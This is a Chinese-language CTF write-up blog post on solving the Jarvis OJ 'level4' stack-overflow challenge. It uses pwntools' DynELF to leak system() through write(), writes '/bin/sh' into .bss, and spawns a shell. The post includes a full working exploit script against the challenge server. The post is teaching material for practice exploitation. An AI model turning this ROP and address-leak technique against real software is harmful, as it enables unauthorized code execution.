Pwn-栈溢出之DynELF

最新推荐文章于 2024-07-07 15:45:06 发布
最新推荐文章于 2024-07-07 15:45:06 发布
阅读量909 收藏 5
点赞数
分类专栏: 题目篇 文章标签: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlesgodx/article/details/88357744
版权

0x00:前言

DynELF方法适用于没有libc的情况,我们可以通过DynELF方法来实现泄露system函数的地址,那么DynELF是什么呢?在pwntools官方文档有介绍,简单而言就是通过leak方法反复进入main函数中查询libc中的内容,其代码框架如下

p = process('./xxx')
def leak(address):
  payload = "xxxxxxxx" + address + "xxxxxxxx"
  p.send(payload)
  data = p.recv(4)
  log.debug("%#x => %s" % (address, (data or '').encode('hex'))) #打印搜索的信息
  return data
d = DynELF(leak, elf=ELF("./xxx")) #初始化DynELF模块
systemAddress = d.lookup('system', 'libc') #在libc文件中搜索system函数的地址

我们通过一道题来深入了解这个方法

0x01:Jarvis Oj-level4

题目链接

https://dn.jarvisoj.com/challengefiles/level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0

解题思路

我们先检测一些保护机制

root@Thunder_J-virtual-machine:~/桌面# checksec level4
[*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/level4'
  Arch:     i386-32-little
  RELRO:    Partial RELRO
  Stack:    No canary found
  NX:       NX enabled #堆栈不可执行
  PIE:      No PIE (0x8048000)

用IDA查看一下主函数内容

main()

如果是做了前面level0-3的朋友应该对这里非常熟悉,逻辑非常简单,我们进vulnerable_function()函数内看一下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}

vulnerable_function()

很明显这里出现栈溢出,read函数读取0x100的内容,双击buf可以看到buf只有0x88+0x4的大小,所以我们可以构造栈溢出

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  return read(0, &buf, 0x100u);
}

第一次构造

既然我们清楚是栈溢出,我们就需要多多观察程序内的信息,有没有system,’/bin/sh’等关键的内容,然而我们用IDA并没有搜索到有system或者’/bin/sh’的信息,那这里就需要用到上面提及的DynELF的方法了,我们通过objdump查看函数信息:

root@Thunder_J-virtual-machine:~/桌面# objdump -R level4

level4:     文件格式 elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049ffc R_386_GLOB_DAT    __gmon_start__
0804a00c R_386_JUMP_SLOT   read@GLIBC_2.0
0804a010 R_386_JUMP_SLOT   __gmon_start__
0804a014 R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0
0804a018 R_386_JUMP_SLOT   write@GLIBC_2.0

我们看到有read和write函数,其实有这两个函数就代表我们可以通过他们来泄露system函数在libc中的地址了,因为我们可以通过栈溢出覆盖返回地址执行,因此我们第一次构造调用write函数泄露libc中system的地址

def leak(addr):
    write_plt = p32(0x08048340)
    fun_addr = p32(0x0804844b)
    payload = 'a' * (0x88 + 0x4) + write_plt + fun_addr + p32(1) + p32(addr) + p32(4) #write(1, addr, 4);
    r.send(payload)
    leaked = r.recv(4)
    return leaked
 
d = DynELF(leak, elf=ELF("./level4"))
system_addr = d.lookup('system', 'libc')

第二次构造

我们在得到了system函数的地址之后就需要写入’/bin/sh’字符串了,那么去哪里写入呢?当然是.bss段,我们通过readelf的方法查看程序的.bss段:

root@Thunder_J-virtual-machine:~/桌面# readelf -S level4
There are 30 section headers, starting at offset 0x1844:

节头:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048154 000154 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048168 000168 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048188 000188 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        080481ac 0001ac 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481cc 0001cc 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804822c 00022c 000050 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          0804827c 00027c 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         08048288 000288 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             080482a8 0002a8 000008 08   A  5   0  4
  [10] .rel.plt          REL             080482b0 0002b0 000020 08  AI  5  12  4
  [11] .init             PROGBITS        080482d0 0002d0 000023 00  AX  0   0  4
  [12] .plt              PROGBITS        08048300 000300 000050 04  AX  0   0 16
  [13] .text             PROGBITS        08048350 000350 0001c2 00  AX  0   0 16
  [14] .fini             PROGBITS        08048514 000514 000014 00  AX  0   0  4
  [15] .rodata           PROGBITS        08048528 000528 000017 00   A  0   0  4
  [16] .eh_frame_hdr     PROGBITS        08048540 000540 000034 00   A  0   0  4
  [17] .eh_frame         PROGBITS        08048574 000574 0000ec 00   A  0   0  4
  [18] .init_array       INIT_ARRAY      08049f08 000f08 000004 00  WA  0   0  4
  [19] .fini_array       FINI_ARRAY      08049f0c 000f0c 000004 00  WA  0   0  4
  [20] .jcr              PROGBITS        08049f10 000f10 000004 00  WA  0   0  4
  [21] .dynamic          DYNAMIC         08049f14 000f14 0000e8 08  WA  6   0  4
  [22] .got              PROGBITS        08049ffc 000ffc 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        0804a000 001000 00001c 04  WA  0   0  4
  [24] .data             PROGBITS        0804a01c 00101c 000008 00  WA  0   0  4
  [25] .bss              NOBITS          0804a024 001024 000004 00  WA  0   0  1
  [26] .comment          PROGBITS        00000000 001024 000052 01  MS  0   0  1
  [27] .shstrtab         STRTAB          00000000 001076 000106 00      0   0  1
  [28] .symtab           SYMTAB          00000000 00117c 000450 10     29  45  4
  [29] .strtab           STRTAB          00000000 0015cc 000276 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
  L (link order), O (extra OS processing required), G (group), T (TLS),
  C (compressed), x (unknown), o (OS specific), E (exclude),
  p (processor specific)

根据上面的数据我们选中.bss段的地址开始第二次构造,在.bss段中写入’/bin/sh’字符串

data_addr = 0x0804A024 # readelf -S level4

read_plt = p32(0x08048310)
fun_addr = p32(0x0804844b)
payload = 'a' * (0x88 + 0x4) + read_plt + fun_addr + p32(0) + p32(data_addr) + p32(8)
r.send(payload)

r.send("/bin/sh\x00")

第三次构造

准备工作做完了当然最后一步就是getshell了

payload = 'a' * (0x88 + 0x4) + p32(system_addr) + 'aaaa' + p32(data_addr)
r.send(payload)

exp

总结一下上面的步骤

from pwn import *
 
r = remote("pwn2.jarvisoj.com", 9880)
 
def leak(addr):
    write_plt = p32(0x08048340)
    fun_addr = p32(0x0804844b)
    buf = p32(addr)
    payload = 'a' * (0x88 + 0x4) + write_plt + fun_addr + p32(1) + buf + p32(4)
    r.send(payload)
    leaked = r.recv(4)
    return leaked
 
d = DynELF(leak, elf=ELF("./level4"))
system_addr = d.lookup('system', 'libc')
 
data_addr = 0x0804A024 # readelf -S level4

read_plt = p32(0x08048310)
fun_addr = p32(0x0804844b)
payload = 'a' * (0x88 + 0x4) + read_plt + fun_addr + p32(0) + p32(data_addr) + p32(8)
r.send(payload)

r.send("/bin/sh\x00")

payload = 'a' * (0x88 + 0x4) + p32(system_addr) + 'aaaa' + p32(data_addr)
r.send(payload)

r.interactive()

0x02:总结

没有做过level0-3的建议做一下在做level4,每个题目收获都会有所不同
参考链接:
https://www.anquanke.com/post/id/85129
https://blog.csdn.net/smalosnail/article/details/53386353

Thunder_J
关注
专栏目录
pwn libc之Dynelf工具
清霂的博客
04-02 535
目录pwn-100pwn-200welpwn Dynelf工具可以根据泄露出的地址找到相应libc版本的其他函数地址,但缺点时不能查找字符串也就是"/bin/sh"的地址,所以找到system函数后,往往还需要找到一个可写的地方用read函数读取"/bin/sh" pwn-100 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="amd64", log_level="debug") contentt = 1 #elf e
pwntools中DynELF使用
weixin_41038905的博客
04-19 888
DynELFpwntools中专门用来应对没有libc情况的漏洞利用模块,在提供一个目标程序任意地址内存泄漏函数的情况下,可以解析任意加载库的任意符号地址。 libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 本文exp以攻防世界中的pwn-100为例 from pwn import * p = process('./pwn-100...
DynELF
钞sir的博客
01-29 6235
我用三生的期许 换回三世相思雨 三千浮沉里的你 迷失轮回的自己
4.pwn elf文件结构
最新发布
2301_80361487的博客
07-07 409
等同于Windows的dll文件glibc是linux下面c标准库的实现,即GNUCLibrary。glibc本身是GNU旗下的C标准库,后来逐渐成为了Linux的标准c库,i而Linux下原来的标准c库Linux libc逐渐不再被维护。Linux下面的标准c库不仅有这一个,如uclibc、klibc,以及上面被提到的Linux libc,但是glibc无疑是用得最多的。glibc在/ib目录下的.so文件为libc.so.6.
初探ROP攻击 Memory Leak & DynELF
HiTaQini
11-28 6140
前言通过泄露内存的方式可以获取目标程序libc中各函数的地址,这种攻击方式可以绕过地址随机化保护。下文通过一个例子讨论泄露内存的ROP攻击。 (ps.本文中的源代码大家可以去我的Github中下载,链接在文章结尾。实践才会出真知啊~)
PWN入门系列(2)栈溢出
小心信科理化声
12-02 1482
PWN入门系列(2) 栈溢出 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(覆盖)。是一种特定的缓冲区溢出漏洞,类似的还有heap、bss溢出等。其前提是: · 程序必须向栈上写入数据 程序对某个函数或者某个模块的输入数据的大小没有控制得当。 基本示例 举个简单的例子: #include <stdio.h> #include <string.h> void success() { puts("You Hava
XCTF pwn-100(使用DynELF)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-14 332
from pwn import * #p = process("./pwn-100") p = remote("111.198.29.45",37259) elf = ELF("./pwn-100") read_got = elf.got['read'] puts_plt = elf.plt['puts'] start = 0x400550 pop_rdi = 0x400763 #ROPgad...
pwn栈溢出之dltest(DynELF和libcSearcher利用)
weixin_44113469的博客
02-15 1259
栈溢出dltest解题步骤 思路分析:观察源码,是个栈溢出。没有system函数,也没有给libc库,但有read函数和write函数。可以借助DynELF泄露函数地址,定为system地址,然后借助read函数写入“/bin/sh”,并调用执行system(“/bin/sh”) 0x01 ...
pwn入门之栈溢出练习
xiaoi123的博客
09-10 4696
本文原创作者:W1ngs,本文属i春秋原创奖励计划,未经许可禁止转载!前言:最近在入门pwn栈溢出,做了一下jarvisoj里的一些ctf pwn题,感觉质量都很不错,难度循序渐进,把自己做题的思路和心得记录了一下,希望能给入门pwn的朋友带来点帮助和启发,大牛轻喷题目链接:https://www.jarvisoj.com/challenges1、level0(64位) 代码  也就是输出Hel...
二进制漏洞挖掘之栈溢出-开启PIE
ylcangel的专栏
10-18 3609
二进制漏洞-栈溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32位 内核版本:Linux 2.6.32-754.10.1.e...
栈溢出利用之DynELF实例
M021的专栏
10-07 4135
无libc库函数时,利用DynELF实现漏洞利用
DynELFpwn200
weixin_44464829的博客
11-15 210
在做漏洞利用时,由于 ASLR 的影响,我们在获取某些函数地址的时候,需要一些特殊的操作。一种方法是先泄露出 libc.so 中的某个函数,然后根据函数之间的偏移,计算得到我们需要的函数地址,这种方法的局限性在于我们需要能找到和目标服务器上一样的 libc.so,而有些特殊情况下往往并不能找到。而另一种方法,利用如 pwntools 的 DynELF 模块,对内存进行搜索,直接得到我们需要的函数地址。 DynELFpwntools中专门用来应对无libc情况的漏洞利用模块,其基本代码框架如下。 p.
HITCTF PWN300--dynelf
Vccxx的博客
04-08 1051
第一次用Dynelf,脚本调了一下午。。hitctf pwn300题目链接:http://pan.baidu.com/s/1eSCCOE2漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。攻击脚本:from pwn import * io = pr
64位下pwntools中dynELF函数的使用
weixin_30362233的博客
12-07 381
这几天有同学问我在64位下怎么用这个函数,于是针对同一道题写了个利用dynELF的方法 编译好的程序http://pan.baidu.com/s/1jImF95O 源码在后面 from pwn import * elf = ELF('./pwn_final') got_write = elf.got['write'] print 'got_write= ' + ...
pwn 练习笔记 暑假第八天 DynELF模块
SsMing的博客
07-20 1920
继续昨天的未解之谜,leve4 在第二次感受火狐崩溃带来的绝望之后,在此立誓,再也不用火狐写博客 IDA打开查看一下伪代码: 图没截全,罢啦罢啦!那vul函数就看汇编吧 可看出,我们输入的字符串与ebp距离为0x88 checksec查看,开了nx保护 ROPgadget查看,没有‘/bin/sh’ DynELFpwntools中专门用来应对无libc情况的漏洞利用模块...
PWN基础14:ELF 文件格式 概述
prettyX的博客
07-16 1055
1、ELF文件格式 ELF:Executable and Linkable Format 一种Linux下常用的可执行文件、对象、共享库的标准文件格式 还有许多其他可执行文件格式:PE、Mach-O、COFF、COM... 内核中处理ELF相关代码参考:fs/binfmt_elf.c ELF中的数据按照Segment、Section两个概念进行划分 2、Segment 用于告诉内核,在执行ELF文件时应该如何映射内存 每个Segment主要包含:加载地址、文件中的范围、内存权限、对齐方式等信息
小白入门pwn笔记--elf文件概述
小白垃圾笔记2
02-01 498
用于攻击的脚本与方案。cpu可以执行的文件。里边好像都是机器码。
PWN学习】ELF保护机制
Morphy_Amo的博客
12-27 3208
文章目录NX防御机制绕过方法编译参数Canary防御机制绕过方法编译参数RELRO防御机制ASLR防御机制绕过方法PIE防御机制绕过方法Reference NX 防御机制 NX在windows中称为DEP。开启NX保护的程序中不能直接使用shellcode执行任意任意代码。 栈溢出的核心在于修改了EIP的值,是程序跳转到shellcode上,从而远程执行命令。在利用的时候需要先写入一段获取shell的代码,然后在执行这一段代码,这就要求存储shellcode的内存区域需要同时拥有写入和执行的权限。而NX的保
pwn+栈溢出解题思路
11-10
pwn是一种利用栈溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值